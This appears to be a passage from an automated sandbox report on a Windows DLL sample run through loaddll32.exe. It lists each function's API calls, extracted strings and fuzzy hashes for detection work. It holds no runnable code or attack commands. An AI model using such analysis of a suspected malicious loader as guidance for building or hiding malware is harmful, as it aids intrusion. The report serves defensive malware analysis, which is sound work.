Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: 1ea64568af13834d028b428a210c61af3b89e58de9eeb8aaba214af3d39f8b3b
Instruction ID: 6a8b239c4aaf54948a3340d6fc12c252486e44645948f5952edb63ad0f49543f
Opcode Fuzzy Hash: 1ea64568af13834d028b428a210c61af3b89e58de9eeb8aaba214af3d39f8b3b
Instruction Fuzzy Hash: 7E31D0B0E046058FEB14DFE4DC187AD7BB4EB89368F204129D815AF3D0D7799905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED110A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6ED110D6
HeapAlloc.KERNEL32(01390000,00000000,0000000F), ref: 6ED110ED
GetProcessHeap.KERNEL32(01390000,00000000,0000000F), ref: 6ED1111F
HeapAlloc.KERNEL32(01390000,00000000,00000010,01390000,00000000,0000000F), ref: 6ED11136
HeapFree.KERNEL32(00000000,?,00000000,00000010,01390000,00000000,0000000F), ref: 6ED1120B
HeapFree.KERNEL32(00000000,?,00000000,00000010,01390000,00000000,0000000F), ref: 6ED1121B

Strings

Control_RunDLL, xrefs: 6ED11102
Control_RunDLL, xrefs: 6ED1114B

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: d7ea81999a4f8a7d1c8b4b27d909c5d1083514ca60e4d4b19617a02372e15190
Instruction ID: 804945610a787534d1d217ae70693b0c7c0aceb4e41bfabf2d43f3c872539f34
Opcode Fuzzy Hash: d7ea81999a4f8a7d1c8b4b27d909c5d1083514ca60e4d4b19617a02372e15190
Instruction Fuzzy Hash: A851BB75D04619DFEB00CFE8DC80BEEB7B9FF99344F104629E9056B281D774A9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2EF20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6ED2EF57
___except_validate_context_record.LIBVCRUNTIME ref: 6ED2EF5F
_ValidateLocalCookies.LIBCMT ref: 6ED2EFE8
__IsNonwritableInCurrentImage.LIBCMT ref: 6ED2F013
_ValidateLocalCookies.LIBCMT ref: 6ED2F068

Strings

csm, xrefs: 6ED2EFFD

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 31601eba9cb3d03d09ded69d9a0c1d9ffc197fa25c20172f321745e94b3efac1
Instruction ID: 6d97f8ffecafb4b49129f2d1407de4a7a2c321f00d0f07513c7fa9b3e7cbbab3
Opcode Fuzzy Hash: 31601eba9cb3d03d09ded69d9a0c1d9ffc197fa25c20172f321745e94b3efac1
Instruction Fuzzy Hash: 0E418034A10219DFCF01DFA8C884ADEBBB5AF4632CF248565EE249B391D731D905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED22960, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6ED6E114), ref: 6ED22994
TlsAlloc.KERNEL32 ref: 6ED229AA
GetProcessHeap.KERNEL32 ref: 6ED229C4
HeapAlloc.KERNEL32(01390000,00000000,0000000C), ref: 6ED229DB
ReleaseSRWLockExclusive.KERNEL32(6ED6E114), ref: 6ED22A18

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6ED22A38

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
API String ID: 3228198226-3009553730
Opcode ID: a469dffdbd468513a449cd3dc53f031630e25456c81ea6a199c4fab2d6f2ae2b
Instruction ID: 55c09f24191c1bd620a80f4d5c6e868c5ab92f3b4656d42f08acf1df0d09bfc7
Opcode Fuzzy Hash: a469dffdbd468513a449cd3dc53f031630e25456c81ea6a199c4fab2d6f2ae2b
Instruction Fuzzy Hash: A34137B19002098FEB10CFE4D845BEEBBB4FB45318F104129EA19AB790DB799945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED342BC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6ED343C9,FFFDC801,00000400,?,00000000,00000001,?,6ED34542,00000021,FlsSetValue,6ED66BF8,6ED66C00,?), ref: 6ED3437D

Strings

ext-ms-, xrefs: 6ED34327
api-ms-, xrefs: 6ED34313

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: e3d8d5e7f620eb822adc8b41cfa9fd289c691c39d1db993fe68098b6b68b6cfa
Instruction ID: e0890adb198c37dd96092070d1734b92f9398961a8179f2746073f4f2403793e
Opcode Fuzzy Hash: e3d8d5e7f620eb822adc8b41cfa9fd289c691c39d1db993fe68098b6b68b6cfa
Instruction Fuzzy Hash: DF21EB36A81631EBDB619BA5CC40A4EB768EB43360F350161ED65A7284D739ED07C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2F3BF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6ED2F101,6ED2CFA2,6ED2C7AC,?,6ED2C9E4,?,00000001,?,?,00000001,?,6ED6AFA8,0000000C,6ED2CADD), ref: 6ED2F3CD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6ED2F3DB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6ED2F3F4
SetLastError.KERNEL32(00000000,6ED2C9E4,?,00000001,?,?,00000001,?,6ED6AFA8,0000000C,6ED2CADD,?,00000001,?), ref: 6ED2F446

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a0977831232b99e184fbf3a9bf7cb1c1196b30a827055439bcb24db817f970d0
Instruction ID: 26d46de0321375f77f880d55f84c2b7a3d3bd4dc9d1df7860f25d6e1570b0874
Opcode Fuzzy Hash: a0977831232b99e184fbf3a9bf7cb1c1196b30a827055439bcb24db817f970d0
Instruction Fuzzy Hash: C101DD3251DB229DFAB467F56C9855637A8DB477BC7300B39E610641D4FFA2880395A0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2BE60, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 6ED2C510: GetTickCount64.KERNEL32 ref: 6ED2C517

GetTickCount64.KERNEL32 ref: 6ED2BE96
GetTickCount64.KERNEL32 ref: 6ED2BEB4
GetTickCount64.KERNEL32 ref: 6ED2BECD
GetTickCount64.KERNEL32 ref: 6ED2BECF
GetTickCount64.KERNEL32 ref: 6ED2BED6
GetTickCount64.KERNEL32 ref: 6ED2BEF4

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: 1a81bb6d74baf54715301ab7a21c5d66a889107ca07045f373fd0b03cab00f03
Instruction ID: d32841aaa5249c02721e52091520d68aeb189ce3e294962861f11522fb629113
Opcode Fuzzy Hash: 1a81bb6d74baf54715301ab7a21c5d66a889107ca07045f373fd0b03cab00f03
Instruction Fuzzy Hash: FF019213C30E188DE243BAB9984155AA7AD6FE73E4F15CB23D10636056FFD054E387A2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED16B40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6ED16C1B
__aulldiv.LIBCMT ref: 6ED16C2B

Strings

'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED16B54
{invalid syntax}, xrefs: 6ED16B84
_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6ED16BAA, 6ED16BE5

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: f6609f6c5ecab88b795a2a9a280ce13433d2c0140af3552923546ffd0ef9df22
Instruction ID: 45d958aa2610a9f3626340996ce1465d0f14717421196c403971f5e0d026b4c4
Opcode Fuzzy Hash: f6609f6c5ecab88b795a2a9a280ce13433d2c0140af3552923546ffd0ef9df22
Instruction Fuzzy Hash: CB419DB171C2108BD7149BA8E940BAEB7D6DF94704F10483DE8C9DF3D5E676C85183A2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1D000, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000001,6ED1C746), ref: 6ED1D00B
TlsGetValue.KERNEL32(00000000,00000001,6ED1C746), ref: 6ED1D023
TlsGetValue.KERNEL32(00000000), ref: 6ED1D043
TlsGetValue.KERNEL32(00000000), ref: 6ED1D063
GetProcessHeap.KERNEL32 ref: 6ED1D076
HeapAlloc.KERNEL32(01390000,00000000,0000000C), ref: 6ED1D089
TlsSetValue.KERNEL32(00000000,00000000,01390000,00000000,0000000C), ref: 6ED1D0B6

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 0574a03347d6c986ce251e09e770edf5c387ceb1c43f81ee9d6dd9254745d3a6
Instruction ID: 4e4df38caf6e59266fd85600b1dce6cdce614eb24e1fa5c6f76a8d9999e98a16
Opcode Fuzzy Hash: 0574a03347d6c986ce251e09e770edf5c387ceb1c43f81ee9d6dd9254745d3a6
Instruction Fuzzy Hash: F7117274708611CFFF605BF5E854BA63398AB42246F100C28E905DB284DB39D847CF75

Uniqueness

Uniqueness Score: -1.00%

Function 6ED33571, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6ED3358D

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 33257a865b8728fa2835402256bfd533cfdef5d95dc22fe03e6f75f52d140589
Instruction ID: 58bf332fa4ec37d5dd69f86f79d764d4dcde0dbd720dc8df3e4a722e93e31eb8
Opcode Fuzzy Hash: 33257a865b8728fa2835402256bfd533cfdef5d95dc22fe03e6f75f52d140589
Instruction Fuzzy Hash: C1219372604225BFDB109FE6CE4899A77BDEF473A87314A29F824D7254DB30EC4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED30422, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6ED304E3,00000000,?,00000001,00000000,?,6ED3055A,00000001,FlsFree,6ED66184,FlsFree,00000000), ref: 6ED304B2

Strings

api-ms-, xrefs: 6ED30472

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: cda53a47124baae821dfbec2950843331fa5f8ec238700acfb5f80a9719f4234
Instruction ID: d1b22996c73363a20d09fda176096e36816ac38f15c16eaa4f6c067f203c49b7
Opcode Fuzzy Hash: cda53a47124baae821dfbec2950843331fa5f8ec238700acfb5f80a9719f4234
Instruction Fuzzy Hash: 0611A732A41A31EFEF618BA88C44B4D33A49F037F0F350121E954EB284E770EE0186E5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED312ED, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B8D6FDDA,00000000,?,00000000,6ED39B33,000000FF,?,6ED3127D,?,?,6ED31251,?), ref: 6ED31322
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ED31334
FreeLibrary.KERNEL32(00000000,?,00000000,6ED39B33,000000FF,?,6ED3127D,?,?,6ED31251,?), ref: 6ED31356

Strings

mscoree.dll, xrefs: 6ED3131B
CorExitProcess, xrefs: 6ED3132C

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 04bc10bd2f6e60563fa09e7583ddd58884c4610589e650e40305727f6a0309b5
Instruction ID: bb2eca01639178d5f7a7eedc013c7417d8531a892f5645535c97ca66fbe35e97
Opcode Fuzzy Hash: 04bc10bd2f6e60563fa09e7583ddd58884c4610589e650e40305727f6a0309b5
Instruction Fuzzy Hash: 3C01D63290496AEFEF119F90CC08FBEBBB8FB06710F104525F821A2680DB74D908CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C2C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ED1C2C5
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6ED1C2D5

Strings

ntdll, xrefs: 6ED1C2C0
NtWaitForKeyedEvent, xrefs: 6ED1C2CF

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: c891e23b629b34ecee055b2ac9786d48fc3b9a1584d4d2c7b2516a7ad6a6dd2b
Instruction ID: 5542b670307cd9e3b12c7a7c134d84ee00bbf4a56a492e242b1e10fac127ffae
Opcode Fuzzy Hash: c891e23b629b34ecee055b2ac9786d48fc3b9a1584d4d2c7b2516a7ad6a6dd2b
Instruction Fuzzy Hash: 80B012F8F44601AFBEB06FF24F0CAA63B28EAB32827400850B016DE10CFA24C005DD72

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C2E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ED1C2E5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6ED1C2F5

Strings

NtReleaseKeyedEvent, xrefs: 6ED1C2EF
ntdll, xrefs: 6ED1C2E0

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: c107aee2e01de1e7cf5cc79d9cffeb7c215cc3778ffb8ef516c8d09754f2bc27
Instruction ID: b0606e09b0d30909fcb7cbb6036113cc089662748da6d48d8a1a11d1e345fee9
Opcode Fuzzy Hash: c107aee2e01de1e7cf5cc79d9cffeb7c215cc3778ffb8ef516c8d09754f2bc27
Instruction Fuzzy Hash: 6EB092B4F04502A7AE706BF25B0CA963A18A9822827000860A022EE108FA24C005D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ED1C285
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6ED1C295

Strings

kernel32, xrefs: 6ED1C280
SetThreadDescription, xrefs: 6ED1C28F

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 36c44d9778372f6c588558106251499e00176bab2773815452139eb152d1d6bf
Instruction ID: f96264de3e73003569960efcc509b609f8e27f20173ed74db2a1a92b53cae314
Opcode Fuzzy Hash: 36c44d9778372f6c588558106251499e00176bab2773815452139eb152d1d6bf
Instruction Fuzzy Hash: 5AB012B8F44602ABBE706FF24F0CA963B29E9C7281B000450B015DA10DEE24C005F972

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C260, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ED1C265
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6ED1C275

Strings

kernel32, xrefs: 6ED1C260
GetSystemTimePreciseAsFileTime, xrefs: 6ED1C26F

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: 471260a2acdbe4c06112da46e3e432497839195bcc8669fdb8bd2be25042404c
Instruction ID: 9f83c132a4e718b0f903a0d9fe18b4b4362e50e9bdfa34c0ba2f19016f5317dd
Opcode Fuzzy Hash: 471260a2acdbe4c06112da46e3e432497839195bcc8669fdb8bd2be25042404c
Instruction Fuzzy Hash: 2AB012F4F04605A7BE706FF24F4CA963B19B9D7281B004450F112DE10CFA24C045ED32

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C300, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ED1C305
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6ED1C315

Strings

NtCreateKeyedEvent, xrefs: 6ED1C30F
ntdll, xrefs: 6ED1C300

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 2aad448632e9baa6e706620b757eb4003c8a55cc41cff11e14fff40b821f6ad1
Instruction ID: a7e1722cf8e09c38785b7594d0f4c6adfa788d45b321218d40ab5ef9d53a79c9
Opcode Fuzzy Hash: 2aad448632e9baa6e706620b757eb4003c8a55cc41cff11e14fff40b821f6ad1
Instruction Fuzzy Hash: D8B092B4F04501ABAE70ABF25A0CA963A18A9532C27404850A022DD10EEA24C406D921

Uniqueness

Uniqueness Score: -1.00%

Function 6ED36749, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(B8D6FDDA,?,00000000,?), ref: 6ED367AC

Part of subcall function 6ED34073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ED361E2,?,00000000,-00000008), ref: 6ED3411F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6ED36A07
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6ED36A4F
GetLastError.KERNEL32 ref: 6ED36AF2

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 230d4e7bff4478fa850c1c090be7f93f14aaeed48d8bc5951490be7ecb5eb781
Instruction ID: c6e25cd799eb3f287c68fb5320248d63b00dbacafb411ae16064d33bad9ba320
Opcode Fuzzy Hash: 230d4e7bff4478fa850c1c090be7f93f14aaeed48d8bc5951490be7ecb5eb781
Instruction Fuzzy Hash: B1D15CB5D14669DFDF01CFE8C8809DDBBB5FF4A314F24852AE865AB241D730A942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED22470, Relevance: 6.2, APIs: 4, Instructions: 215COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6ED22601
WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6ED22653
GetLastError.KERNEL32(?,?,?), ref: 6ED2265D
GetLastError.KERNEL32(?,?,?), ref: 6ED226C5

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
